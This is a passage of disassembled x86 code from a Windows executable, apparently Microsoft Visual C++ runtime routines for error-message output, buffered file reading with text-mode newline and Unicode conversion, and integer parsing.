		push	offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
		push	ebp
		call	sub_40FAE4
		add	esp, 0Ch
		jmp	short loc_40A20E
; ---------------------------------------------------------------------------

loc_40A1DB:				; CODE XREF: sub_40A074+30j
					; sub_40A074+49j
		push	0FFFFFFF4h
		call	ds:dword_41E148	; GetStdHandle
		mov	ebp, eax
		cmp	ebp, esi
		jz	short loc_40A20E
		cmp	ebp, 0FFFFFFFFh
		jz	short loc_40A20E
		push	0
		lea	eax, [esp+18h+var_4]
		push	eax
		lea	esi, ds:424C04h[edi*8]
		push	dword ptr [esi]
		call	sub_4046F0
		pop	ecx
		push	eax
		push	dword ptr [esi]
		push	ebp
		call	ds:off_41E088

loc_40A20E:				; CODE XREF: sub_40A074+55j
					; sub_40A074+165j ...
		pop	ebp

loc_40A20F:				; CODE XREF: sub_40A074+1Ej
		pop	edi
		pop	esi
		pop	ebx
		pop	ecx
		retn
sub_40A074	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A214	proc near		; CODE XREF: sub_403C6E+23p
					; sub_40449D+9p ...
		push	3
		call	sub_40FC82
		cmp	eax, 1
		pop	ecx
		jz	short loc_40A236
		push	3
		call	sub_40FC82
		test	eax, eax
		pop	ecx
		jnz	short locret_40A24C
		cmp	dword_424050, 1
		jnz	short locret_40A24C

loc_40A236:				; CODE XREF: sub_40A214+Bj
		push	0FCh
		call	sub_40A074
		push	0FFh
		call	sub_40A074
		pop	ecx
		pop	ecx

locret_40A24C:				; CODE XREF: sub_40A214+17j
					; sub_40A214+20j
		retn
sub_40A214	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A24D	proc near		; CODE XREF: sub_4040B2+EDp
					; sub_4093EC+Fp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		xor	edi, edi
		cmp	esi, edi
		jnz	short loc_40A276
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		jmp	loc_40A367
; ---------------------------------------------------------------------------

loc_40A276:				; CODE XREF: sub_40A24D+Aj
		mov	eax, [esi+0Ch]
		test	al, 83h
		jz	loc_40A367
		test	al, 40h
		jnz	loc_40A367
		test	al, 2
		jz	short loc_40A298
		or	eax, 20h
		mov	[esi+0Ch], eax
		jmp	loc_40A367
; ---------------------------------------------------------------------------

loc_40A298:				; CODE XREF: sub_40A24D+3Ej
		or	eax, 1
		test	ax, 10Ch
		mov	[esi+0Ch], eax
		jnz	short loc_40A2AD
		push	esi
		call	sub_40DABC
		pop	ecx
		jmp	short loc_40A2B2
; ---------------------------------------------------------------------------

loc_40A2AD:				; CODE XREF: sub_40A24D+55j
		mov	eax, [esi+8]
		mov	[esi], eax

loc_40A2B2:				; CODE XREF: sub_40A24D+5Ej
		push	dword ptr [esi+18h]
		push	dword ptr [esi+8]
		push	esi
		call	sub_408FE0
		pop	ecx
		push	eax
		call	sub_40A90F
		add	esp, 0Ch
		cmp	eax, edi
		mov	[esi+4], eax
		jz	loc_40A357
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40A357
		test	byte ptr [esi+0Ch], 82h
		jnz	short loc_40A32D
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_40A318
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_40A318
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437EC0h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40A31D
; ---------------------------------------------------------------------------

loc_40A318:				; CODE XREF: sub_40A24D+9Bj
					; sub_40A24D+A7j
		mov	eax, offset dword_424BD0

loc_40A31D:				; CODE XREF: sub_40A24D+C9j
		mov	al, [eax+4]
		and	al, 82h
		cmp	al, 82h
		jnz	short loc_40A32D
		or	dword ptr [esi+0Ch], 2000h

loc_40A32D:				; CODE XREF: sub_40A24D+8Fj
					; sub_40A24D+D7j
		cmp	dword ptr [esi+18h], 200h
		jnz	short loc_40A34A
		mov	eax, [esi+0Ch]
		test	al, 8
		jz	short loc_40A34A
		test	ax, 400h
		jnz	short loc_40A34A
		mov	dword ptr [esi+18h], 1000h

loc_40A34A:				; CODE XREF: sub_40A24D+E7j
					; sub_40A24D+EEj ...
		mov	ecx, [esi]
		dec	dword ptr [esi+4]
		movzx	eax, byte ptr [ecx]
		inc	ecx
		mov	[esi], ecx
		jmp	short loc_40A36A
; ---------------------------------------------------------------------------

loc_40A357:				; CODE XREF: sub_40A24D+80j
					; sub_40A24D+89j
		neg	eax
		sbb	eax, eax
		and	eax, 10h
		add	eax, 10h
		or	[esi+0Ch], eax
		mov	[esi+4], edi

loc_40A367:				; CODE XREF: sub_40A24D+24j
					; sub_40A24D+2Ej ...
		or	eax, 0FFFFFFFFh

loc_40A36A:				; CODE XREF: sub_40A24D+108j
		pop	edi
		pop	esi
		retn
sub_40A24D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40A36D	proc near		; CODE XREF: sub_40A90F+9Ap
					; sub_40E632+355p ...

var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= word ptr -8
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		mov	edx, [ebp+arg_8]
		push	esi
		mov	esi, [ebp+arg_0]
		push	0FFFFFFFEh
		pop	eax
		cmp	esi, eax
		mov	[ebp+var_14], eax
		mov	[ebp+var_1C], edx
		jnz	short loc_40A3A2
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	eax, 0FFFFFFFFh
		jmp	loc_40A90C
; ---------------------------------------------------------------------------

loc_40A3A2:				; CODE XREF: sub_40A36D+18j
		push	edi
		xor	edi, edi
		cmp	esi, edi
		jl	short loc_40A3B1
		cmp	esi, dword_437EA4
		jb	short loc_40A3D8

loc_40A3B1:				; CODE XREF: sub_40A36D+3Aj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 9
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_40A90B
; ---------------------------------------------------------------------------

loc_40A3D8:				; CODE XREF: sub_40A36D+42j
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		push	ebx
		lea	ebx, ds:437EC0h[eax*4]
		mov	eax, [ebx]
		add	eax, esi
		mov	cl, [eax+4]
		test	cl, 1
		jnz	short loc_40A40E
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		jmp	loc_40A555
; ---------------------------------------------------------------------------

loc_40A40E:				; CODE XREF: sub_40A36D+88j
		cmp	edx, edi
		mov	[ebp+var_10], edi
		jz	loc_40A908
		test	cl, 2
		jnz	loc_40A908
		mov	ecx, [ebp+arg_4]
		cmp	ecx, edi
		jz	loc_40A543
		mov	al, [eax+24h]
		add	al, al
		sar	al, 1
		mov	[ebp+var_2], al
		movsx	eax, al
		dec	eax
		jz	loc_40A53B
		dec	eax
		jnz	short loc_40A456
		mov	eax, edx
		not	eax
		test	al, 1
		jz	loc_40A543
		and	edx, 0FFFFFFFEh
		mov	[ebp+arg_8], edx

loc_40A456:				; CODE XREF: sub_40A36D+D5j
		mov	[ebp+var_C], ecx

loc_40A459:				; CODE XREF: sub_40A36D+216j
		mov	ecx, [ebx]
		mov	eax, [ebp+var_C]
		lea	edi, [esi+ecx]
		test	byte ptr [edi+4], 48h
		jz	short loc_40A4DD
		mov	cl, [edi+5]
		cmp	cl, 0Ah
		jz	short loc_40A4DD
		xor	edx, edx
		cmp	[ebp+arg_8], edx
		jz	short loc_40A4DD
		mov	[eax], cl
		mov	ecx, [ebx]
		inc	eax
		dec	[ebp+arg_8]
		cmp	[ebp+var_2], dl
		mov	[ebp+var_10], 1
		mov	byte ptr [esi+ecx+5], 0Ah
		jz	short loc_40A4DD
		mov	ecx, [ebx]
		mov	cl, [esi+ecx+25h]
		cmp	cl, 0Ah
		jz	short loc_40A4DD
		cmp	[ebp+arg_8], edx
		jz	short loc_40A4DD
		mov	[eax], cl
		mov	ecx, [ebx]
		inc	eax
		dec	[ebp+arg_8]
		cmp	[ebp+var_2], 1
		mov	[ebp+var_10], 2
		mov	byte ptr [esi+ecx+25h],	0Ah
		jnz	short loc_40A4DD
		mov	ecx, [ebx]
		mov	cl, [esi+ecx+26h]
		cmp	cl, 0Ah
		jz	short loc_40A4DD
		cmp	[ebp+arg_8], edx
		jz	short loc_40A4DD
		mov	[eax], cl
		mov	ecx, [ebx]
		inc	eax
		dec	[ebp+arg_8]
		mov	[ebp+var_10], 3
		mov	byte ptr [esi+ecx+26h],	0Ah

loc_40A4DD:				; CODE XREF: sub_40A36D+F8j
					; sub_40A36D+100j ...
		push	0
		lea	ecx, [ebp+var_18]
		push	ecx
		push	[ebp+arg_8]
		push	eax
		mov	eax, [ebx]
		push	dword ptr [esi+eax]
		call	ds:off_41E078
		test	eax, eax
		jz	loc_40A8D2
		mov	edi, [ebp+var_18]
		test	edi, edi
		jl	loc_40A8D2
		cmp	edi, [ebp+arg_8]
		ja	loc_40A8D2
		mov	eax, [ebx]
		add	[ebp+var_10], edi
		lea	eax, [esi+eax+4]
		test	byte ptr [eax],	80h
		jz	loc_40A772
		cmp	[ebp+var_2], 2
		jz	loc_40A79C
		test	edi, edi
		jz	short loc_40A5A7
		mov	ecx, [ebp+var_C]
		cmp	byte ptr [ecx],	0Ah
		jnz	short loc_40A5A7
		or	byte ptr [eax],	4
		jmp	short loc_40A5AA
; ---------------------------------------------------------------------------

loc_40A53B:				; CODE XREF: sub_40A36D+CEj
		mov	eax, edx
		not	eax
		test	al, 1
		jnz	short loc_40A564

loc_40A543:				; CODE XREF: sub_40A36D+BAj
					; sub_40A36D+DDj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 16h

loc_40A555:				; CODE XREF: sub_40A36D+9Cj
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40A59F
; ---------------------------------------------------------------------------

loc_40A564:				; CODE XREF: sub_40A36D+1D4j
		mov	eax, edx
		push	4
		pop	ecx
		shr	eax, 1
		cmp	eax, ecx
		mov	[ebp+arg_8], ecx
		jb	short loc_40A575
		mov	[ebp+arg_8], eax

loc_40A575:				; CODE XREF: sub_40A36D+203j
		push	[ebp+arg_8]
		call	sub_407CFA
		cmp	eax, edi
		pop	ecx
		mov	[ebp+var_C], eax
		jnz	loc_40A459
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		call	sub_405DA6
		mov	dword ptr [eax], 8

loc_40A59F:				; CODE XREF: sub_40A36D+1F5j
		or	eax, 0FFFFFFFFh
		jmp	loc_40A90A
; ---------------------------------------------------------------------------

loc_40A5A7:				; CODE XREF: sub_40A36D+1BFj
					; sub_40A36D+1C7j
		and	byte ptr [eax],	0FBh

loc_40A5AA:				; CODE XREF: sub_40A36D+1CCj
		mov	edi, [ebp+var_C]
		mov	eax, [ebp+var_10]
		add	eax, edi
		cmp	edi, eax
		mov	[ebp+arg_8], edi
		mov	[ebp+var_10], eax
		jnb	loc_40A690

loc_40A5C0:				; CODE XREF: sub_40A36D+306j
		mov	ecx, [ebp+arg_8]
		mov	al, [ecx]
		cmp	al, 1Ah
		jz	loc_40A67B
		cmp	al, 0Dh
		jz	short loc_40A5DD
		mov	[edi], al
		inc	edi
		inc	ecx
		mov	[ebp+arg_8], ecx
		jmp	loc_40A66D
; ---------------------------------------------------------------------------

loc_40A5DD:				; CODE XREF: sub_40A36D+262j
		mov	eax, [ebp+var_10]
		dec	eax
		cmp	ecx, eax
		jnb	short loc_40A5FC
		lea	eax, [ecx+1]
		cmp	byte ptr [eax],	0Ah
		jnz	short loc_40A5F7
		inc	ecx
		inc	ecx
		mov	[ebp+arg_8], ecx

loc_40A5F2:				; CODE XREF: sub_40A36D+2CAj
					; sub_40A36D+2E3j
		mov	byte ptr [edi],	0Ah
		jmp	short loc_40A66C
; ---------------------------------------------------------------------------

loc_40A5F7:				; CODE XREF: sub_40A36D+27Ej
		mov	[ebp+arg_8], eax
		jmp	short loc_40A669
; ---------------------------------------------------------------------------

loc_40A5FC:				; CODE XREF: sub_40A36D+276j
		inc	[ebp+arg_8]
		push	0
		lea	eax, [ebp+var_18]
		push	eax
		push	1
		lea	eax, [ebp+var_1]
		push	eax
		mov	eax, [ebx]
		push	dword ptr [esi+eax]
		call	ds:off_41E078
		test	eax, eax
		jnz	short loc_40A624
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		test	eax, eax
		jnz	short loc_40A669

loc_40A624:				; CODE XREF: sub_40A36D+2ABj
		cmp	[ebp+var_18], 0
		jz	short loc_40A669
		mov	eax, [ebx]
		test	byte ptr [esi+eax+4], 48h
		jz	short loc_40A647
		cmp	[ebp+var_1], 0Ah
		jz	short loc_40A5F2
		mov	byte ptr [edi],	0Dh
		mov	eax, [ebx]
		mov	cl, [ebp+var_1]
		mov	[esi+eax+5], cl
		jmp	short loc_40A66C
; ---------------------------------------------------------------------------

loc_40A647:				; CODE XREF: sub_40A36D+2C4j
		cmp	edi, [ebp+var_C]
		jnz	short loc_40A652
		cmp	[ebp+var_1], 0Ah
		jz	short loc_40A5F2

loc_40A652:				; CODE XREF: sub_40A36D+2DDj
		push	1
		push	0FFFFFFFFh
		push	0FFFFFFFFh
		push	[ebp+arg_0]
		call	sub_40D27E
		add	esp, 10h
		cmp	[ebp+var_1], 0Ah
		jz	short loc_40A66D

loc_40A669:				; CODE XREF: sub_40A36D+28Dj
					; sub_40A36D+2B5j ...
		mov	byte ptr [edi],	0Dh

loc_40A66C:				; CODE XREF: sub_40A36D+288j
					; sub_40A36D+2D8j
		inc	edi

loc_40A66D:				; CODE XREF: sub_40A36D+26Bj
					; sub_40A36D+2FAj
		mov	eax, [ebp+var_10]
		cmp	[ebp+arg_8], eax
		jb	loc_40A5C0
		jmp	short loc_40A690
; ---------------------------------------------------------------------------

loc_40A67B:				; CODE XREF: sub_40A36D+25Aj
		mov	eax, [ebx]
		lea	eax, [esi+eax+4]
		test	byte ptr [eax],	40h
		jnz	short loc_40A68B
		or	byte ptr [eax],	2
		jmp	short loc_40A690
; ---------------------------------------------------------------------------

loc_40A68B:				; CODE XREF: sub_40A36D+317j
		mov	al, [ecx]
		mov	[edi], al
		inc	edi

loc_40A690:				; CODE XREF: sub_40A36D+24Dj
					; sub_40A36D+30Cj ...
		mov	eax, edi
		sub	eax, [ebp+var_C]
		cmp	[ebp+var_2], 1
		mov	[ebp+var_10], eax
		jnz	loc_40A772
		test	eax, eax
		jz	loc_40A772
		dec	edi
		mov	cl, [edi]
		test	cl, cl
		js	short loc_40A6B7
		inc	edi
		jmp	loc_40A73D
; ---------------------------------------------------------------------------

loc_40A6B7:				; CODE XREF: sub_40A36D+342j
		xor	eax, eax
		inc	eax
		movzx	ecx, cl
		jmp	short loc_40A6CE
; ---------------------------------------------------------------------------

loc_40A6BF:				; CODE XREF: sub_40A36D+368j
		cmp	eax, 4
		jg	short loc_40A6D7
		cmp	edi, [ebp+var_C]
		jb	short loc_40A6D7
		dec	edi
		movzx	ecx, byte ptr [edi]
		inc	eax

loc_40A6CE:				; CODE XREF: sub_40A36D+350j
		cmp	byte_424CB8[ecx], 0
		jz	short loc_40A6BF

loc_40A6D7:				; CODE XREF: sub_40A36D+355j
					; sub_40A36D+35Aj
		mov	dl, [edi]
		movzx	ecx, dl
		movsx	ecx, byte_424CB8[ecx]
		test	ecx, ecx
		jnz	short loc_40A6F4
		call	sub_405D93
		mov	dword ptr [eax], 2Ah
		jmp	short loc_40A76E
; ---------------------------------------------------------------------------

loc_40A6F4:				; CODE XREF: sub_40A36D+378j
		inc	ecx
		cmp	ecx, eax
		jnz	short loc_40A6FD
		add	edi, eax
		jmp	short loc_40A73D
; ---------------------------------------------------------------------------

loc_40A6FD:				; CODE XREF: sub_40A36D+38Aj
		mov	ecx, [ebx]
		add	ecx, esi
		test	byte ptr [ecx+4], 48h
		jz	short loc_40A72B
		inc	edi
		cmp	eax, 2
		mov	[ecx+5], dl
		jl	short loc_40A719
		mov	dl, [edi]
		mov	ecx, [ebx]
		mov	[esi+ecx+25h], dl
		inc	edi

loc_40A719:				; CODE XREF: sub_40A36D+3A1j
		cmp	eax, 3
		jnz	short loc_40A727
		mov	dl, [edi]
		mov	ecx, [ebx]
		mov	[esi+ecx+26h], dl
		inc	edi

loc_40A727:				; CODE XREF: sub_40A36D+3AFj
		sub	edi, eax
		jmp	short loc_40A73D
; ---------------------------------------------------------------------------

loc_40A72B:				; CODE XREF: sub_40A36D+398j
		neg	eax
		cdq
		push	1
		push	edx
		push	eax
		push	[ebp+arg_0]
		call	sub_40D27E
		add	esp, 10h

loc_40A73D:				; CODE XREF: sub_40A36D+345j
					; sub_40A36D+38Ej ...
		mov	eax, [ebp+var_1C]
		sub	edi, [ebp+var_C]
		shr	eax, 1
		push	eax
		push	[ebp+arg_4]
		push	edi
		push	[ebp+var_C]
		push	0
		push	0FDE9h
		call	ds:dword_41E0A0	; MultiByteToWideChar
		test	eax, eax
		mov	[ebp+var_10], eax
		jnz	short loc_40A795
		call	ds:dword_41E0EC	; RtlGetLastWin32Error

loc_40A767:				; CODE XREF: sub_40A36D+58Cj
		push	eax
		call	sub_405DB9
		pop	ecx

loc_40A76E:				; CODE XREF: sub_40A36D+385j
					; sub_40A36D+584j
		or	[ebp+var_14], 0FFFFFFFFh

loc_40A772:				; CODE XREF: sub_40A36D+1ADj
					; sub_40A36D+32Fj ...
		mov	eax, [ebp+var_C]
		cmp	eax, [ebp+arg_4]
		jz	short loc_40A781
		push	eax
		call	sub_403B91
		pop	ecx

loc_40A781:				; CODE XREF: sub_40A36D+40Bj
		mov	eax, [ebp+var_14]
		cmp	eax, 0FFFFFFFEh
		jnz	loc_40A90A
		mov	eax, [ebp+var_10]
		jmp	loc_40A90A
; ---------------------------------------------------------------------------

loc_40A795:				; CODE XREF: sub_40A36D+3F2j
		add	eax, eax
		mov	[ebp+var_10], eax
		jmp	short loc_40A772
; ---------------------------------------------------------------------------

loc_40A79C:				; CODE XREF: sub_40A36D+1B7j
		test	edi, edi
		jz	short loc_40A7AE
		mov	ecx, [ebp+var_C]
		cmp	word ptr [ecx],	0Ah
		jnz	short loc_40A7AE
		or	byte ptr [eax],	4
		jmp	short loc_40A7B1
; ---------------------------------------------------------------------------

loc_40A7AE:				; CODE XREF: sub_40A36D+431j
					; sub_40A36D+43Aj
		and	byte ptr [eax],	0FBh

loc_40A7B1:				; CODE XREF: sub_40A36D+43Fj
		mov	edi, [ebp+var_C]
		mov	eax, [ebp+var_10]
		add	eax, edi
		cmp	edi, eax
		mov	[ebp+arg_8], edi
		mov	[ebp+var_10], eax
		jnb	loc_40A8C7

loc_40A7C7:				; CODE XREF: sub_40A36D+53Aj
		mov	eax, [ebp+arg_8]
		movzx	ecx, word ptr [eax]
		cmp	cx, 1Ah
		jz	loc_40A8AF
		cmp	cx, 0Dh
		jz	short loc_40A7EC
		mov	[edi], cx
		inc	edi
		inc	edi
		inc	eax
		inc	eax
		mov	[ebp+arg_8], eax
		jmp	loc_40A8A1
; ---------------------------------------------------------------------------

loc_40A7EC:				; CODE XREF: sub_40A36D+46Ej
		mov	ecx, [ebp+var_10]
		add	ecx, 0FFFFFFFEh
		cmp	eax, ecx
		jnb	short loc_40A817
		lea	ecx, [eax+2]
		cmp	word ptr [ecx],	0Ah
		jnz	short loc_40A80F
		add	eax, 4
		mov	[ebp+arg_8], eax

loc_40A805:				; CODE XREF: sub_40A36D+4E7j
					; sub_40A36D+513j
		mov	word ptr [edi],	0Ah
		jmp	loc_40A89F
; ---------------------------------------------------------------------------

loc_40A80F:				; CODE XREF: sub_40A36D+490j
		mov	[ebp+arg_8], ecx
		jmp	loc_40A89A
; ---------------------------------------------------------------------------

loc_40A817:				; CODE XREF: sub_40A36D+487j
		add	[ebp+arg_8], 2
		push	0
		lea	eax, [ebp+var_18]
		push	eax
		push	2
		lea	eax, [ebp+var_8]
		push	eax
		mov	eax, [ebx]
		push	dword ptr [esi+eax]
		call	ds:off_41E078
		test	eax, eax
		jnz	short loc_40A840
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		test	eax, eax
		jnz	short loc_40A89A

loc_40A840:				; CODE XREF: sub_40A36D+4C7j
		cmp	[ebp+var_18], 0
		jz	short loc_40A89A
		mov	eax, [ebx]
		test	byte ptr [esi+eax+4], 48h
		jz	short loc_40A876
		cmp	[ebp+var_8], 0Ah
		jz	short loc_40A805
		mov	word ptr [edi],	0Dh
		mov	eax, [ebx]
		mov	cl, byte ptr [ebp+var_8]
		mov	[esi+eax+5], cl
		mov	eax, [ebx]
		mov	cl, byte ptr [ebp+var_8+1]
		mov	[esi+eax+25h], cl
		mov	eax, [ebx]
		mov	byte ptr [esi+eax+26h],	0Ah
		jmp	short loc_40A89F
; ---------------------------------------------------------------------------

loc_40A876:				; CODE XREF: sub_40A36D+4E0j
		cmp	edi, [ebp+var_C]
		jnz	short loc_40A882
		cmp	[ebp+var_8], 0Ah
		jz	short loc_40A805

loc_40A882:				; CODE XREF: sub_40A36D+50Cj
		push	1
		push	0FFFFFFFFh
		push	0FFFFFFFEh
		push	[ebp+arg_0]
		call	sub_40D27E
		add	esp, 10h
		cmp	[ebp+var_8], 0Ah
		jz	short loc_40A8A1

loc_40A89A:				; CODE XREF: sub_40A36D+4A5j
					; sub_40A36D+4D1j ...
		mov	word ptr [edi],	0Dh

loc_40A89F:				; CODE XREF: sub_40A36D+49Dj
					; sub_40A36D+507j
		inc	edi
		inc	edi

loc_40A8A1:				; CODE XREF: sub_40A36D+47Aj
					; sub_40A36D+52Bj
		mov	eax, [ebp+var_10]
		cmp	[ebp+arg_8], eax
		jb	loc_40A7C7
		jmp	short loc_40A8C7
; ---------------------------------------------------------------------------

loc_40A8AF:				; CODE XREF: sub_40A36D+464j
		mov	ecx, [ebx]
		lea	esi, [esi+ecx+4]
		test	byte ptr [esi],	40h
		jnz	short loc_40A8BF
		or	byte ptr [esi],	2
		jmp	short loc_40A8C7
; ---------------------------------------------------------------------------

loc_40A8BF:				; CODE XREF: sub_40A36D+54Bj
		mov	ax, [eax]
		mov	[edi], ax
		inc	edi
		inc	edi

loc_40A8C7:				; CODE XREF: sub_40A36D+454j
					; sub_40A36D+540j ...
		sub	edi, [ebp+var_C]
		mov	[ebp+var_10], edi
		jmp	loc_40A772
; ---------------------------------------------------------------------------

loc_40A8D2:				; CODE XREF: sub_40A36D+187j
					; sub_40A36D+192j ...
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	5
		pop	esi
		cmp	eax, esi
		jnz	short loc_40A8F6
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], esi
		jmp	loc_40A76E
; ---------------------------------------------------------------------------

loc_40A8F6:				; CODE XREF: sub_40A36D+570j
		cmp	eax, 6Dh
		jnz	loc_40A767
		and	[ebp+var_14], 0
		jmp	loc_40A772
; ---------------------------------------------------------------------------

loc_40A908:				; CODE XREF: sub_40A36D+A6j
					; sub_40A36D+AFj
		xor	eax, eax

loc_40A90A:				; CODE XREF: sub_40A36D+235j
					; sub_40A36D+41Aj ...
		pop	ebx

loc_40A90B:				; CODE XREF: sub_40A36D+66j
		pop	edi

loc_40A90C:				; CODE XREF: sub_40A36D+30j
		pop	esi
		leave
		retn
sub_40A36D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40A90F	proc near		; CODE XREF: sub_4040B2+C9p
					; sub_40A24D+73p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	10h
		push	offset dword_422B10
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40A93E
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40A936:				; CODE XREF: sub_40A90F+5Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_40A9DB
; ---------------------------------------------------------------------------

loc_40A93E:				; CODE XREF: sub_40A90F+12j
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_40A94C
		cmp	eax, dword_437EA4
		jb	short loc_40A96D

loc_40A94C:				; CODE XREF: sub_40A90F+33j
					; sub_40A90F+7Cj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40A936
; ---------------------------------------------------------------------------

loc_40A96D:				; CODE XREF: sub_40A90F+3Bj
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:437EC0h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jz	short loc_40A94C
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_40A9B6
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40A36D
		add	esp, 0Ch
		mov	[ebp+var_1C], eax
		jmp	short loc_40A9CC
; ---------------------------------------------------------------------------

loc_40A9B6:				; CODE XREF: sub_40A90F+8Fj
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], edi
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40A9CC:				; CODE XREF: sub_40A90F+A5j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40A9E1
		mov	eax, [ebp+var_1C]

loc_40A9DB:				; CODE XREF: sub_40A90F+2Aj
		call	__SEH_epilog4
		retn
sub_40A90F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A9E1	proc near		; CODE XREF: sub_40A90F+C4p
					; DATA XREF: zcrshv4o:00422B28o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_40A9E1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40A9EB	proc near		; CODE XREF: sub_40AC16:loc_40AC35p

var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	esi
		push	edi
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_14]
		call	sub_402CAD
		mov	eax, [ebp+arg_8]
		mov	esi, [ebp+arg_4]
		xor	edi, edi
		cmp	eax, edi
		jz	short loc_40AA0C
		mov	[eax], esi

loc_40AA0C:				; CODE XREF: sub_40A9EB+1Dj
		cmp	esi, edi
		jnz	short loc_40AA3C

loc_40AA10:				; CODE XREF: sub_40A9EB+5Aj
					; sub_40A9EB+60j
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_8], 0
		jz	short loc_40AA35
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40AA35:				; CODE XREF: sub_40A9EB+41j
		xor	eax, eax
		jmp	loc_40AC12
; ---------------------------------------------------------------------------

loc_40AA3C:				; CODE XREF: sub_40A9EB+23j
		cmp	[ebp+arg_C], edi
		jz	short loc_40AA4D
		cmp	[ebp+arg_C], 2
		jl	short loc_40AA10
		cmp	[ebp+arg_C], 24h
		jg	short loc_40AA10

loc_40AA4D:				; CODE XREF: sub_40A9EB+54j
		mov	ecx, [ebp+var_14]
		push	ebx
		mov	bl, [esi]
		mov	[ebp+var_4], edi
		lea	edi, [esi+1]

loc_40AA59:				; CODE XREF: sub_40A9EB+A5j
		cmp	dword ptr [ecx+0ACh], 1
		jle	short loc_40AA79
		lea	eax, [ebp+var_14]
		push	eax
		movzx	eax, bl
		push	8
		push	eax
		call	sub_40D004
		mov	ecx, [ebp+var_14]
		add	esp, 0Ch
		jmp	short loc_40AA89
; ---------------------------------------------------------------------------

loc_40AA79:				; CODE XREF: sub_40A9EB+75j
		mov	edx, [ecx+0C8h]
		movzx	eax, bl
		movzx	eax, byte ptr [edx+eax*2]
		and	eax, 8

loc_40AA89:				; CODE XREF: sub_40A9EB+8Cj
		test	eax, eax
		jz	short loc_40AA92
		mov	bl, [edi]
		inc	edi
		jmp	short loc_40AA59
; ---------------------------------------------------------------------------

loc_40AA92:				; CODE XREF: sub_40A9EB+A0j
		cmp	bl, 2Dh
		jnz	short loc_40AA9D
		or	[ebp+arg_10], 2
		jmp	short loc_40AAA2
; ---------------------------------------------------------------------------

loc_40AA9D:				; CODE XREF: sub_40A9EB+AAj
		cmp	bl, 2Bh
		jnz	short loc_40AAA5

loc_40AAA2:				; CODE XREF: sub_40A9EB+B0j
